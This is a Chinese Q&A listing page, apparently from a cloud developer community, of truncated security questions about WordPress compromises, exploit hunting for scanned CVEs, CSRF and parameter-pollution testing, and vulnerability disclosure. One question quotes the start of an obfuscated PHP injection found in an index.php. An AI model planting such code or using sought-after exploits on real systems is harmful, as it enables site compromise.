我一直在为我的创业开发一个简单的网站,并遇到了一些安全问题。了解我有限的知识以及与wordpress和人为错误相关的所有可能的漏洞,我想在外部服务器/服务上实现简单的后端操作。对于如何尽可能安全地实现这一点,我有什么想法/建议,或者我可能遇到的任何问题?
(谢谢;)
浏览 0提问于2019-01-31得票数 0
2回答
在哪里可以找到利用代码?
、、、、
我运行Nessus扫描仪,发现了一些与HP系统管理主页相关的严重漏洞。CVE-2010-2939CVE-2010-3709CVE-2010-4156CVE-2011-1541有谁能告诉我我可以在哪些
浏览 0提问于2011-12-04得票数 6
回答已采纳
1回答
我听说没有专门的工具来测试和发现网站的CSRF漏洞。因此,从安全测试人员的角度来看,如何测试CSRF漏洞?
浏览 0提问于2014-09-18得票数 10
回答已采纳
3回答
我无法找到与OpenVAS扫描器中使用快速7漏洞数据库和开发数据库等网站或使用“search”之类命令的漏洞相匹配的漏洞。对于msf控制台或其他寻找匹配漏洞的想法,您有什么建议/命令吗?
浏览 0提问于2014-11-20得票数 3
回答已采纳
3回答
逆向工程与开发研究
、、、、
有人能给我一个在软件和逆向工程中发现漏洞的起点吗?我有高层次和低层次编程的背景,比如组装.我想知道“黑客”是如何在操作系统上找到所有漏洞的.例如,我听说有人在apache上发现了一个利用反向工程在linux上运行的漏洞.。
浏览 0提问于2015-09-02得票数 -4
1回答
在我们正在开发的网站中,在进行了安全检查之后,我们发现了安全问题。此报告还包含HTTP参数污染漏洞。在网上我可以找到什么是HPP?它如何注入&等等,但我无法找到如何避免这类问题。服务器语言是php。那么,有谁能用例子来指导我如何避免HPP漏洞呢?
提前谢谢
浏览 2提问于2013-11-06得票数 4
回答已采纳
所有的网站都有不同的主题,在不同的服务器上,在不同的用户内部隔离。他们已经竞选了几个月,没有任何问题。然而,今天上午我的客户让我知道,他的一个网站已经开始重新定向到恶意网站了!
有什么办法解决这个问题吗?
浏览 6提问于2020-04-20得票数 0
1回答
如何在此处查找代码中的漏洞。我的任务是让我用没有程序的方式找到漏洞,所以没有spotbugs,等等。有什么网站和/或提示可以让我找到漏洞吗?这是我的代码
我试过用谷歌搜索,但我很难找到可靠的网站或文档来查找或帮助我找到漏洞。
浏览 0提问于2019-07-12得票数 0
1回答
作为一种爱好,我发现从XSS到SQLi到LFI等安全漏洞都存在于随机网站中。(我没有剥削他们)。我决定做得更多,我想创建一个由黑客组成的志愿者小组,他们将发现漏洞并向网站报告。我发现了两个“问题”:我在哪里可以找到其他非恶意黑客?网站将是完全随机的;没有特定的网站将成为目标,测试将在网站的同意或不知情的情况下进行。如果发现了一个<e
浏览 0提问于2012-04-07得票数 6
回答已采纳
一位道德黑客顾问来警告我们,他们在我们的一些服务器上发现了一个漏洞:
提前谢谢。
浏览 3提问于2018-02-20得票数 0
在德国,每个人都担心一个向公众公开他们的wp-config的知名政党:这有多大的安全风险?例如,数据库只能从本地ip访问。文件内容:define('DB_USER', 'afd-web-dev');
define('DB_PASSWORD', 'm*******d'); //redacted for p
浏览 0提问于2014-05-23得票数 4
我正在主持大约20个Wordpress网站在一个主机。当我从病毒中清除一个网站时(.ico文件将代码注入到index.php中),另一个已经清理过的网站被再次注入(在几个小时或几天内)。对所有sql基进行备份和删除所有文件的解决方案-对我不起作用-因为在一些网站中,我的小自定义脚本(没什么,只是在html中做了很小的修改,非常肯定我没有错误地创建漏洞)。所以我的问题是:
如果不是,将文件管理器中的权限更改为例如54
浏览 0提问于2018-08-26得票数 0
我有一个PHP网站,我已经完成了所有的URL重写。使得PHP扩展被隐藏。但是不知何故,网络爬虫和安全扫描器/漏洞扫描器能够找到我的站点是用PHP开发的。我如何避免这种情况,或者如何欺骗他们,使他们相信这个网站不是通过PHP开发的?
浏览 4提问于2014-02-15得票数 1
回答已采纳
1回答
我已经运行了一个Qualys应用程序扫描一个客户网站,并发现了“路径披露路径基础上的漏洞”。如果正常的URL是这样的http://example.com/
我可以在那里找到文件和目录,并在服务器中导航。所以问题是,如何修复这个漏洞?
浏览 0提问于2018-04-13得票数 0
回答已采纳
我找到了一个使用纯文本字段作为密码输入表单的网站。.>
我知道肩部冲浪是一个漏洞,但是否还有其他漏洞使input type="password"成为一个更安全的选择?
浏览 0提问于2019-01-31得票数 2
看起来像是一个明显的“不”,但我想我还是继续问一下,看看有没有什么东西:我觉得有点离题,但我希望听到一个好的答案:)
浏览 2提问于2010-12-06得票数 0
回答已采纳
1回答
作为我的服务器上唯一没有其他人可以访问的开发人员,我很好奇黑客是否能以某种方式写入php文件?我在我的index.php的顶部遇到了这段PHP代码,我不熟悉它,也没有自己把它放在那里。我不知道该怎么做,也不知道他们的企图是什么,有点担心。任何建议都很感谢谢谢。@ini_set('display_errors', '0');$ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_re
浏览 0提问于2016-08-03得票数 1
2回答
我在一个网站中发现了一个SQL注入漏洞,我想去报告它。我确实有联系电子邮件,但我担心他们会起诉我,因为我找到了一种方式黑进他们的网站。(不,我没有运行任何SQL命令)。
所以..。除了匿名之外,我该如何报道这件事呢?
浏览 0提问于2015-07-23得票数 0
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
腾讯会议
云直播活动推荐
腾讯云开发者
